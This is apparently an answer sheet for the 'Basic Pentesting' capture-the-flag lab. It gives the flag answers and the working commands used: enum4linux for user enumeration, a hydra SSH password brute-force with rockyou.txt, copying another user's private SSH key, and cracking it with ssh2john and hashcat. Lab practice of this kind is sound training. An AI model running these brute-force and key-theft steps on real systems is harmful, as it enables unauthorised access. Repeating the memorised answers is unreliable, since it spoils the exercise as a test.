Basic Pentesting

task1

Deploy the machine and connect to our network

Find the services exposed by the machine

What is the name of the hidden directory on the web server(enter name without /)?

development

User brute-forcing to find the username & password

What is the username?

enum4linux 10.10.252.28 

jan

What is the password?

hydra -l jan -P ./webtools/rockyou.txt 10.10.252.28 ssh

[22][ssh] host: 10.10.252.28   login: jan   password: armando

What service do you use to access the server(answer in abbreviation in all caps)?

SSH

Enumerate the machine to find any vectors for privilege escalation

What is the name of the other user you found(all lower case)?

kay

If you have found another user, what can you do with this information?

What is the final password you obtain?

scp jan@10.10.252.28:/home/kay/.ssh/id_rsa ./
ssh2john id_rsa > 1.txt
hashcat -m 22931 1.txt  -a 0 ./webtools/rockyou.txt  --force

heresareallystrongpasswordthatfollowsthepasswordpolicy$$